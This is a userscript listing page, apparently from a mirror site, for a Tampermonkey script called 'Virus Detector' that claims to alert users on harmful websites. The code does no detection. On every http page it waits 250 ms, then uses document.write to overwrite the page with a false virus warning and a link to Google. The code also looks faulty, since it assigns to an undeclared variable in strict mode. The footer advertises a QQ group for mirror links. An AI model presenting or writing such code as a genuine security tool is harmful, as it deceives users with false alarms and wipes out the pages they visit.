Virus Detector

Get alerted when you are on a harmful website.

目前為 2022-06-06 提交的版本,檢視 最新版本

// ==UserScript==
// @name         Virus Detector
// @namespace    http://tampermonkey.net/
// @version      0.2
// @description  Get alerted when you are on a harmful website.
// @author       Thundercatcher
// @match        http://*/*
// @icon         data:image/gif;base64,R0lGODlhAQABAAAAACH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==
// @grant        none
// ==/UserScript==

(function() {
    'use strict';

    {writePromise = new Promise((res) =>
    setTimeout(() => {
      document.write(`>
      <p>This website looks like it contains a virus. Please proceed back to <a href="https://www.google.com/">Google</a>.</p>
       `);
      res();
    }, 250)
  );
}})()

QingJ © 2025

镜像随时可能失效,请加Q群300939539或关注我们的公众号极客氢云获取最新地址